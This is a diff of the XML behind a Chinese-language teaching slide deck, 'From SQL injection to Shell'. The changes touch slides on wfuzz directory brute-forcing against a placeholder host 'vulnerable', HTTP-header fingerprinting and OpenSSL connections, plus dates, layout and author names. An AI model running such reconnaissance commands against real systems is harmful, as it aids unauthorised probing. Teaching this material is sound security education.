-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>4.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>目录内容暴力嗅探 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>wfuzz</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>    试</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>出指定目录下存在的文件</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" indent="0">
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>   wfuzz.py </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>-z  file -f  commons.txt  --</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>hc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>  404 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
-              <a:t>     http</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>://vulnerable/FUZZ.php</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="虚尾箭头 5"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6444868" y="3123342"/>
-            <a:ext cx="1046602" cy="661012"/>
-          </a:xfrm>
-          <a:prstGeom prst="stripedRightArrow">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="dk1">
-              <a:shade val="50000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="dk1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="dk1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr"/>
-            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="文本框 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="7744858" y="2214694"/>
-            <a:ext cx="2949474" cy="3139321"/>
+            <a:off x="914400" y="2157155"/>
+            <a:ext cx="10363826" cy="3424107"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10559,71 +12626,331 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>HTTP/1.1 200 OK</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Date: Thu, 24 Nov 2011 04:40:51 GMT</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Server: Apache/2.2.16 (</a:t>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>这里的应用程序只能通过</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>。</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>如果应用程序只能通过</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>HTTPS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Telnet</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>或</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>X-Powered-By: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
-              <a:t>PHP/5.3.3-7</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>+squeeze3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Vary: Accept-Encoding</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Content-Length: 1335</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>Content-Type: text/html</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t>netcat</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>就无法与服务器通信，可以使用工具</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>OpenSSL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>：</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="图片 4"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1256874" y="3090295"/>
+            <a:ext cx="4611663" cy="455292"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="文本框 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4190817" y="3957446"/>
+            <a:ext cx="4531057" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>vulnerable</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>主机名</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>或服务器的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>IP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>地址</a:t>
+            </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="8" name="直接箭头连接符 7"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipV="1">
+            <a:off x="4722125" y="3425589"/>
+            <a:ext cx="0" cy="600501"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="文本框 8"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5164827" y="4755147"/>
+            <a:ext cx="6303842" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>443 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
+              <a:t>是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>应用程序使用的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>TCP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>端口（</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>443</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>是</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>HTTPS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>默认值）</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:cxnSp>
+        <p:nvCxnSpPr>
+          <p:cNvPr id="11" name="直接箭头连接符 10"/>
+          <p:cNvCxnSpPr/>
+          <p:nvPr/>
+        </p:nvCxnSpPr>
+        <p:spPr>
+          <a:xfrm flipV="1">
+            <a:off x="5404513" y="3545587"/>
+            <a:ext cx="13648" cy="1209560"/>
+          </a:xfrm>
+          <a:prstGeom prst="straightConnector1">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:ln>
+            <a:tailEnd type="triangle"/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="tx1"/>
+          </a:fontRef>
+        </p:style>
+      </p:cxnSp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="标题 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="516157"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:buNone/>
+              <a:defRPr sz="3600" kern="1200" cap="all" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>指纹收集 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>检查</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>HTTP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
+              <a:t>头</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841778488"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417932679"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/2016-2/zc_snRNA/FlippedClassroom_FromSqlInjectionToShell/From SQL injection to Shell.pptx
+++ b/2016-2/zc_snRNA/FlippedClassroom_FromSqlInjectionToShell/From SQL injection to Shell.pptx
@@ -322,7 +322,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -634,7 +634,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -856,7 +856,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -1147,7 +1147,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -1601,7 +1601,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -2177,7 +2177,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3029,7 +3029,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3234,7 +3234,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3448,7 +3448,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3653,7 +3653,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -3933,7 +3933,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4200,7 +4200,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4615,7 +4615,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4763,7 +4763,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -4888,7 +4888,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -5167,7 +5167,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -5479,7 +5479,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -5732,7 +5732,7 @@
           <a:p>
             <a:fld id="{97CFA8C0-C318-4EBE-9809-E2C3738A3427}" type="datetimeFigureOut">
               <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
-              <a:t>2016/10/29</a:t>
+              <a:t>2016/10/30</a:t>
             </a:fld>
             <a:endParaRPr lang="zh-CN" altLang="en-US"/>
           </a:p>
@@ -6225,14 +6225,31 @@
             <p:ph type="subTitle" idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3006606" y="4819933"/>
+            <a:ext cx="8689976" cy="1371599"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
-              <a:t>小组成员：赵畅 宋楠</a:t>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>Group members:   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>zc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
+              <a:t>sn</a:t>
             </a:r>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
@@ -9042,7 +9059,6 @@
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
               <a:t>注入</a:t>
             </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -9058,13 +9074,13 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1298499" y="1905918"/>
-            <a:ext cx="9595002" cy="4032174"/>
+            <a:off x="1011895" y="1592019"/>
+            <a:ext cx="10266329" cy="4032174"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="92500"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -9192,6 +9208,119 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="文本框 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1243908" y="5499258"/>
+            <a:ext cx="8672887" cy="923330"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>资料</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>来源：</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>必应词典 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>sql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> injection]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>	 http://www.bing.com/knows/search?q=sql+injection&amp;mkt=zh-cn&amp;FORM=BKACAI</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1">
+                    <a:lumMod val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1">
+                  <a:lumMod val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -10294,7 +10423,6 @@
               <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
               <a:t>获取当前的内核版本</a:t>
             </a:r>
-            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -11090,10 +11218,6 @@
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
               <a:t>http://www.bing.com/knows/search?q=sql+injection&amp;mkt=zh-cn&amp;FORM=BKACAI</a:t>
             </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t/>
-            </a:r>
             <a:br>
               <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
             </a:br>
@@ -11174,7 +11298,12 @@
             <p:ph type="title"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913149" y="318266"/>
+            <a:ext cx="10364451" cy="1596177"/>
+          </a:xfrm>
+        </p:spPr>
